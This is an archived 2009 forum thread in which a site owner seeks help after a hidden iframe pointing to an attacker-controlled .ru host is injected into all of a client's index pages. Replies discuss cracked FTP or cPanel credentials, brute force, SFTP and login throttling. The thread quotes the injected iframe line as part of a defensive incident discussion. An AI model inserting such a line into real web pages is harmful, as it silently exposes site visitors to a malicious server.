Hooch Posted August 15, 2009 Share Posted August 15, 2009 Hello all. I have a client who was hacked. All thier websites under the 1 package they have werecomprimised. So I have to wonder if they cracked their CPanel password. The problem that has occured is an iframe was entered to the code of every index.php andevery index.html page on all the sites. Even in sub folders. I went and deleted all the codebut it shows back up again after some time. Here's the code... iframe src="http://3f4.ru:8080/index.php" width=151 height=198 style="visibility: hidden" Any idea how this would have happened? I'm not sure if it would be through the CPanel or maybe itwould be a form I created? Or was the web provider hacked? And if anyone has experience with this how do I find the hole? I did email the providers abuse dept. but a quick responce from here may save downtime.Thank you Link to comment Share on other sites More sharing options...
boen_robot Posted August 15, 2009 Share Posted August 15, 2009 If it's at the very bottom of your PHP and HTML files, i.e. <?php//PHP code here?><iframe src="http://3f4.ru:8080/index.php" width=151 height=198 style="visibility: hidden"><iframe> Then it's unlikely that a form you created is the reason... unless you have a form that lets users edit files on the server. If you have such a form, it's possible that the attacker worked around your defences in it to alter PHP files.Otherwise, cracking your FTP and/or CPanel accounts is the more likely cause. Change your password at those places, and make sure it's a strong password too.If you use third party CMS-es (WordPress, Joomla, IPB, etc.), upgrade them to their latest versions, as it is possible that a security hole in THEM let to the demise of your own files. Link to comment Share on other sites More sharing options...
Hooch Posted August 15, 2009 Author Share Posted August 15, 2009 Thanks for that info.The index.html files had the code just after the body tag. (opening tag)The index.php files had the code at the very bottom.I did change the passwords.I went to PCTools.com and created one there.Here's hoping it's fixed!! Link to comment Share on other sites More sharing options...
Synook Posted August 16, 2009 Share Posted August 16, 2009 If you have the option, also use SFTP instead of FTP, as it is more secure. Link to comment Share on other sites More sharing options...
Hooch Posted August 16, 2009 Author Share Posted August 16, 2009 Okay thank you Synook. Any help here is very much appreciated.I had a question asked by one of the members why would they hack us?Why do they want our information.I don't think this was for that. This was more for getting people to visitsites so the hacker can receive $$ correct?Can anyone shed light one what the reason may have been from that code above?Thank you Link to comment Share on other sites More sharing options...
boen_robot Posted August 16, 2009 Share Posted August 16, 2009 Okay thank you Synook. Any help here is very much appreciated.I had a question asked by one of the members why would they hack us?Why do they want our information.I don't think this was for that. This was more for getting people to visitsites so the hacker can receive $$ correct?Can anyone shed light one what the reason may have been from that code above?Thank youI think your assumption on ad revenue is a correct one. If your users click those ads, the attacker gets some cash.There's also one more thing to note though. The attacker detects success. He now knows there is a weak link in the chain that he can use to try and do some real damage, like stealing your users' passwords. And once they do that, they could try and use them on other sites to potentially get their banking information at the end and steal their money. Link to comment Share on other sites More sharing options...
Hooch Posted August 16, 2009 Author Share Posted August 16, 2009 I'm assuming the FTP was cracked. Not sure how since it was a difficult one.If the CPanel PW was cracked should I be worried and look for files they mayhave uploaded? Is this a normal practice?I am looking, but nothing found yet. If they have got ahold of the users table in the DB those passwords were hashed and salted.How could they know what the pw is? Link to comment Share on other sites More sharing options...
boen_robot Posted August 16, 2009 Share Posted August 16, 2009 The answer to all of it - brute force attack.If they can get ahold of the users table, AND they know your exact hash types and salting algoritms, they can try all possible combinations until the hash matches.Same deal with FTP and CPanel - they try every possible password, and store it. You can easily write a program that does that.You can ask your host if they do some "auditing" on CPanel and FTP. i.e. if they block a certain IP after N amount of unsuccessful login attempts per day. Link to comment Share on other sites More sharing options...
Hooch Posted August 16, 2009 Author Share Posted August 16, 2009 Steps done so far:1. Changed passwords for CPanel and FTP.2. Changed password for the database.To do:1. Ask members of the site to change thier password and also change passwords that are the same on other important sites (ie banking)2. Look into blocking ip's after numerous login failures.Anything else you would recommend?And thank you for your time and knowledge on this issue. Link to comment Share on other sites More sharing options...
Synook Posted August 16, 2009 Share Posted August 16, 2009 What happened to using SFTP? Remember, if you use normal FTP your password is sent in plain to the server. Link to comment Share on other sites More sharing options...
Hooch Posted August 17, 2009 Author Share Posted August 17, 2009 That too :)Just checked....No SFTP Link to comment Share on other sites More sharing options...
walapu Posted August 17, 2009 Share Posted August 17, 2009 http://whois.domaintools.com/3f4.ruTry this maybe? There is a number. It is very odd though that each time you refresh the ip changes. After a few trys I got this one 62.112.155.45 it seems to be the correct one.I did a who is search on the ip and it came up with this.http://www.networksolutions.com/whois/resu...p=62.112.155.45Then I managed to get this.http://www.db.ripe.net/whois?form_type=sim...o_search=Search Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.